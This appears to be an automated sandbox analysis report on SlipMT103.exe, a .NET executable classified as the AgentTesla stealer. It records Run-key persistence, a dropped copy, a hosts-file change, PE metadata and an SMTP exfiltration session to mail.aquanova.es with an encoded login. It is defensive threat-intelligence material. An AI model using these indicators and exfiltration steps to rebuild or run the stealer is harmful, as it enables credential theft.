Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.adwa.spyw.evad.winEXE@7/5@1/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 92.122.145.220
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/528729/sample/SlipMT103.exe

Simulations

Behavior and APIs

Time | Type | Description
18:02:44 | API Interceptor | 749x Sleep call for process: SlipMT103.exe modified
18:03:15 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kprUEGC C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
18:03:23 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kprUEGC C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
18:03:25 | API Interceptor | 506x Sleep call for process: kprUEGC.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          51.83.52.225011#2022.exeGet hashmaliciousBrowse
                            ST#00321.exeGet hashmaliciousBrowse
                              #001245DOC.exeGet hashmaliciousBrowse
                                3eMNB.exeGet hashmaliciousBrowse
                                  File#BOL.exeGet hashmaliciousBrowse
                                    PE9j2qM.exeGet hashmaliciousBrowse
                                      Doc#$file.exeGet hashmaliciousBrowse
                                        Cceeoj9#234.exeGet hashmaliciousBrowse
                                          x02101BL6.exeGet hashmaliciousBrowse
                                            #Doc252501.exeGet hashmaliciousBrowse
                                              ls1w#doc.exeGet hashmaliciousBrowse
                                                file#0017.exeGet hashmaliciousBrowse
                                                  6ZDoc#0021.exeGet hashmaliciousBrowse
                                                    Doc3105.exeGet hashmaliciousBrowse
                                                      #Doc14$.exeGet hashmaliciousBrowse
                                                        FTG#00123.exeGet hashmaliciousBrowse
                                                          #doc010025$#.exeGet hashmaliciousBrowse
                                                            VsS28Z6.exeGet hashmaliciousBrowse
                                                              qUmVi#001.exeGet hashmaliciousBrowse
                                                                #LTINV0710.exeGet hashmaliciousBrowse

                                                                  Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
mail.aquanova.es | 011#2022.exe | Get hash | malicious | Browse | 51.83.52.225
mail.aquanova.es | ST#00321.exe | Get hash | malicious | Browse | 51.83.52.225
mail.aquanova.es | #001245DOC.exe | Get hash | malicious | Browse | 51.83.52.225
mail.aquanova.es | 3eMNB.exe | Get hash | malicious | Browse | 51.83.52.225
mail.aquanova.es | File#BOL.exe | Get hash | malicious | Browse | 51.83.52.225
mail.aquanova.es | PE9j2qM.exe | Get hash | malicious | Browse | 51.83.52.225
mail.aquanova.es | Doc#$file.exe | Get hash | malicious | Browse | 51.83.52.225
mail.aquanova.es | Cceeoj9#234.exe | Get hash | malicious | Browse | 51.83.52.225
mail.aquanova.es | x02101BL6.exe | Get hash | malicious | Browse | 51.83.52.225
mail.aquanova.es | #Doc252501.exe | Get hash | malicious | Browse | 51.83.52.225
mail.aquanova.es | ls1w#doc.exe | Get hash | malicious | Browse | 51.83.52.225
mail.aquanova.es | file#0017.exe | Get hash | malicious | Browse | 51.83.52.225
mail.aquanova.es | 6ZDoc#0021.exe | Get hash | malicious | Browse | 51.83.52.225
mail.aquanova.es | Doc3105.exe | Get hash | malicious | Browse | 51.83.52.225
mail.aquanova.es | #Doc14$.exe | Get hash | malicious | Browse | 51.83.52.225
mail.aquanova.es | FTG#00123.exe | Get hash | malicious | Browse | 51.83.52.225
mail.aquanova.es | #doc010025$#.exe | Get hash | malicious | Browse | 51.83.52.225
mail.aquanova.es | VsS28Z6.exe | Get hash | malicious | Browse | 51.83.52.225
mail.aquanova.es | qUmVi#001.exe | Get hash | malicious | Browse | 51.83.52.225
mail.aquanova.es | #LTINV0710.exe | Get hash | malicious | Browse | 51.83.52.225

                                                                  ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
OVHFR | TT COPY_02101011.exe | Get hash | malicious | Browse | 213.186.33.5
OVHFR | EzCOXP6oxy.dll | Get hash | malicious | Browse | 51.210.242.234
OVHFR | IkroV40UrZ.dll | Get hash | malicious | Browse | 51.210.242.234
OVHFR | C1Q17Dg4RT.dll | Get hash | malicious | Browse | 51.210.242.234
OVHFR | or4ypx7Ery | Get hash | malicious | Browse | 213.251.131.0
OVHFR | MakbLShaqA.dll | Get hash | malicious | Browse | 51.210.242.234
OVHFR | MakbLShaqA.dll | Get hash | malicious | Browse | 51.210.242.234
OVHFR | COMPROBANTE DE CONSIGNACION #0000012992-882383393293293.vbs | Get hash | malicious | Browse | 149.56.200.165
OVHFR | Ljm7n1QDZe | Get hash | malicious | Browse | 51.77.179.226
OVHFR | SOA.exe | Get hash | malicious | Browse | 54.38.220.85
OVHFR | Swift Copy TT.doc | Get hash | malicious | Browse | 46.105.145.216
OVHFR | tUJXpPwU27.dll | Get hash | malicious | Browse | 51.210.242.234
OVHFR | SecuriteInfo.com.ArtemisEC35A67F3663.5978.exe | Get hash | malicious | Browse | 51.79.99.124
OVHFR | 4777_211122173928_001.xlsx | Get hash | malicious | Browse | 51.79.99.124
OVHFR | xzmHphquAP.exe | Get hash | malicious | Browse | 51.79.119.231
OVHFR | .#U266bvmail-478314QOZVOYBY30.htm | Get hash | malicious | Browse | 146.59.152.166
OVHFR | pYebrdRKvR.dll | Get hash | malicious | Browse | 51.210.242.234
OVHFR | pPX9DaPVYj.dll | Get hash | malicious | Browse | 51.210.242.234
OVHFR | wUKXjICs5f.dll | Get hash | malicious | Browse | 51.210.242.234
OVHFR | cRC6TZG6Wx.dll | Get hash | malicious | Browse | 51.210.242.234

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SlipMT103.exe.log
                                                                  Process:C:\Users\user\Desktop\SlipMT103.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2239
                                                                  Entropy (8bit):5.354287817410997
                                                                  Encrypted:false
                                                                  SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                                                                  MD5:913D1EEA179415C6D08FB255AE42B99D
                                                                  SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                                                                  SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                                                                  SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                                                                  Malicious:true
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kprUEGC.exe.log
                                                                  Process:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2239
                                                                  Entropy (8bit):5.354287817410997
                                                                  Encrypted:false
                                                                  SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                                                                  MD5:913D1EEA179415C6D08FB255AE42B99D
                                                                  SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                                                                  SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                                                                  SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                  C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                  Process:C:\Users\user\Desktop\SlipMT103.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):512000
                                                                  Entropy (8bit):7.875344748787779
                                                                  Encrypted:false
                                                                  SSDEEP:12288:i2s0XixBFm+L0Cm6Zt5Q47S8oGsxBJxFmanL8FA:ls0Xi1FYCmCt5H/oXx3XmanQF
                                                                  MD5:5CBAC1B17CEF2BC95F5B18F87EC1DE49
                                                                  SHA1:85D362C8463EAAF6C071414F741F32BD4CC51F0C
                                                                  SHA-256:29291B4FB097C75DC3ECF4787A03175EC150319E9AB97A96B6084D1FE2DAE2A5
                                                                  SHA-512:418D44DC7F1FCA6C718AA6B61F545723ECD969E57CA05564703EB820888847833D22CA805F934F62F9461F278092E78060289ACA98CA2123DA51C0D85CEBA84D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 40%
                                                                  Reputation:low
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b.a..............0.................. ........@.. .......................@............@.................................x...O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........e...u..........(...P.............................................{ ...*..{!...*..{"...*..{#...*..($.....} .....}!.....}"......}#...*....0..s........u........f.,`(%....{ ....{ ...o&...,H('....{!....{!...o(...,0()....{"....{"...o*...,.(+....{#....{#...o,...+..+..*..0..b....... .@d )UU.Z(%....{ ...o-...X )UU.Z('....{!...o....X )UU.Z()....{"...o/...X )UU.Z(+....{#...o0...X*...0...........r...p......%..{ ......%q.........-.&.+.......o1....%..{!......%q.........-.&.+.....
                                                                  C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe:Zone.Identifier
                                                                  Process:C:\Users\user\Desktop\SlipMT103.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                  C:\Windows\System32\drivers\etc\hosts
                                                                  Process:C:\Users\user\Desktop\SlipMT103.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:modified
                                                                  Size (bytes):846
                                                                  Entropy (8bit):4.712383132025728
                                                                  Encrypted:false
                                                                  SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcB
                                                                  MD5:5B2D17233558878A82EE464D04F58B59
                                                                  SHA1:47EBFFCAD0B4C358DF0D6A06EF335CB6AAB0AB20
                                                                  SHA-256:5B036588BB4CAD3DE01DD04988AF705DA135D9F394755080CF9941444C09A542
                                                                  SHA-512:D2AEC9779EB8803514213A8E396B2F7C0B4A6F57DE1EE84E9DB0343EE5FF093E26BB70E0737A6681E21E88898EF5139969FF0B4B700CB6727979BD898FDBC85B
                                                                  Malicious:true
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: # Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1..127.0.0.1

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.875344748787779
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:SlipMT103.exe
                                                                  File size:512000
                                                                  MD5:5cbac1b17cef2bc95f5b18f87ec1de49
                                                                  SHA1:85d362c8463eaaf6c071414f741f32bd4cc51f0c
                                                                  SHA256:29291b4fb097c75dc3ecf4787a03175ec150319e9ab97a96b6084d1fe2dae2a5
                                                                  SHA512:418d44dc7f1fca6c718aa6b61f545723ecd969e57ca05564703eb820888847833d22ca805f934f62f9461f278092e78060289aca98ca2123da51c0d85ceba84d
                                                                  SSDEEP:12288:i2s0XixBFm+L0Cm6Zt5Q47S8oGsxBJxFmanL8FA:ls0Xi1FYCmCt5H/oXx3XmanQF
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b.a..............0.................. ........@.. .......................@............@................................

                                                                  File Icon

                                                                  Icon Hash:00828e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x47e4ca
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x619F62DF [Thu Nov 25 10:18:07 2021 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [ebp+0800000Eh], ch
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

Data Directories

Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x7e478         | 0x4f         | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x80000         | 0x5dc        | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x82000         | 0xc          | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x7c4e0 | 0x7c600 | False | 0.899063677764 | data | 7.88568951342 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x80000 | 0x5dc | 0x600 | False | 0.436197916667 | data | 4.1768210155 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x82000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x80090 | 0x34c | data | |
RT_MANIFEST | 0x803ec | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

Imports

DLL         | Import
mscoree.dll | _CorExeMain

Version Infos

Description      | Data
Translation      | 0x0000 0x04b0
LegalCopyright   | Copyright Rogers Peet
Assembly Version | 8.0.6.0
InternalName     | IArraySortHelp.exe
FileVersion      | 5.6.0.0
CompanyName      | Rogers Peet
LegalTrademarks  |
Comments         |
ProductName      | Biblan
ProductVersion   | 5.6.0.0
FileDescription  | Biblan
OriginalFilename | IArraySortHelp.exe

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/25/21-18:04:37.058361 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49830 | 587 | 192.168.2.6 | 51.83.52.225

Network Port Distribution

TCP Packets

Timestamp                         | Source Port | Dest Port | Source IP    | Dest IP
Nov 25, 2021 18:04:36.812948942 CET | 49830 | 587   | 192.168.2.6  | 51.83.52.225
Nov 25, 2021 18:04:36.841125011 CET | 587   | 49830 | 51.83.52.225 | 192.168.2.6
Nov 25, 2021 18:04:36.841310978 CET | 49830 | 587   | 192.168.2.6  | 51.83.52.225
Nov 25, 2021 18:04:36.883404970 CET | 587   | 49830 | 51.83.52.225 | 192.168.2.6
Nov 25, 2021 18:04:36.883806944 CET | 49830 | 587   | 192.168.2.6  | 51.83.52.225
Nov 25, 2021 18:04:36.910588980 CET | 587   | 49830 | 51.83.52.225 | 192.168.2.6
Nov 25, 2021 18:04:36.911751032 CET | 49830 | 587   | 192.168.2.6  | 51.83.52.225
Nov 25, 2021 18:04:36.939304113 CET | 587   | 49830 | 51.83.52.225 | 192.168.2.6
Nov 25, 2021 18:04:36.940468073 CET | 49830 | 587   | 192.168.2.6  | 51.83.52.225
Nov 25, 2021 18:04:36.974989891 CET | 587   | 49830 | 51.83.52.225 | 192.168.2.6
Nov 25, 2021 18:04:36.975754023 CET | 49830 | 587   | 192.168.2.6  | 51.83.52.225
Nov 25, 2021 18:04:37.002334118 CET | 587   | 49830 | 51.83.52.225 | 192.168.2.6
Nov 25, 2021 18:04:37.002614975 CET | 49830 | 587   | 192.168.2.6  | 51.83.52.225
Nov 25, 2021 18:04:37.029778004 CET | 587   | 49830 | 51.83.52.225 | 192.168.2.6
Nov 25, 2021 18:04:37.030325890 CET | 49830 | 587   | 192.168.2.6  | 51.83.52.225
Nov 25, 2021 18:04:37.056842089 CET | 587   | 49830 | 51.83.52.225 | 192.168.2.6
Nov 25, 2021 18:04:37.056906939 CET | 587   | 49830 | 51.83.52.225 | 192.168.2.6
Nov 25, 2021 18:04:37.058361053 CET | 49830 | 587   | 192.168.2.6  | 51.83.52.225
Nov 25, 2021 18:04:37.058660030 CET | 49830 | 587   | 192.168.2.6  | 51.83.52.225
Nov 25, 2021 18:04:37.059335947 CET | 49830 | 587   | 192.168.2.6  | 51.83.52.225
Nov 25, 2021 18:04:37.059407949 CET | 49830 | 587   | 192.168.2.6  | 51.83.52.225
Nov 25, 2021 18:04:37.085125923 CET | 587   | 49830 | 51.83.52.225 | 192.168.2.6
Nov 25, 2021 18:04:37.085825920 CET | 587   | 49830 | 51.83.52.225 | 192.168.2.6
Nov 25, 2021 18:04:37.086770058 CET | 587   | 49830 | 51.83.52.225 | 192.168.2.6
Nov 25, 2021 18:04:37.126884937 CET | 49830 | 587   | 192.168.2.6  | 51.83.52.225

UDP Packets

Timestamp                         | Source Port | Dest Port | Source IP   | Dest IP
Nov 25, 2021 18:04:36.609776974 CET | 62208 | 53    | 192.168.2.6 | 8.8.8.8
Nov 25, 2021 18:04:36.690001965 CET | 53    | 62208 | 8.8.8.8     | 192.168.2.6

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 25, 2021 18:04:36.609776974 CET | 192.168.2.6 | 8.8.8.8 | 0x3890 | Standard query (0) | mail.aquanova.es | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 25, 2021 18:04:36.690001965 CET | 8.8.8.8 | 192.168.2.6 | 0x3890 | No error (0) | mail.aquanova.es | | 51.83.52.225 | A (IP address) | IN (0x0001)

SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 25, 2021 18:04:36.883404970 CET | 587 | 49830 | 51.83.52.225 | 192.168.2.6 | 220-com335.raiolanetworks.es - ESMTP
    220- Do not use of this server to send unsolicited
    220 and/or bulk e-mails. These actions will be persecuted.
Nov 25, 2021 18:04:36.883806944 CET | 49830 | 587 | 192.168.2.6 | 51.83.52.225 | EHLO 305090
Nov 25, 2021 18:04:36.910588980 CET | 587 | 49830 | 51.83.52.225 | 192.168.2.6 | 250-com335.raiolanetworks.es Hello 305090 [84.17.52.63]
    250-SIZE 52428800
    250-8BITMIME
    250-DSN
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Nov 25, 2021 18:04:36.911751032 CET | 49830 | 587 | 192.168.2.6 | 51.83.52.225 | AUTH login YWRtaW5pc3RyYWNpb25AYXF1YW5vdmEuZXM=
Nov 25, 2021 18:04:36.939304113 CET | 587 | 49830 | 51.83.52.225 | 192.168.2.6 | 334 UGFzc3dvcmQ6
Nov 25, 2021 18:04:36.974989891 CET | 587 | 49830 | 51.83.52.225 | 192.168.2.6 | 235 Authentication succeeded
Nov 25, 2021 18:04:36.975754023 CET | 49830 | 587 | 192.168.2.6 | 51.83.52.225 | MAIL FROM:<administracion@aquanova.es>
Nov 25, 2021 18:04:37.002334118 CET | 587 | 49830 | 51.83.52.225 | 192.168.2.6 | 250 OK
Nov 25, 2021 18:04:37.002614975 CET | 49830 | 587 | 192.168.2.6 | 51.83.52.225 | RCPT TO:<administracion@aquanova.es>
Nov 25, 2021 18:04:37.029778004 CET | 587 | 49830 | 51.83.52.225 | 192.168.2.6 | 250 Accepted
Nov 25, 2021 18:04:37.030325890 CET | 49830 | 587 | 192.168.2.6 | 51.83.52.225 | DATA
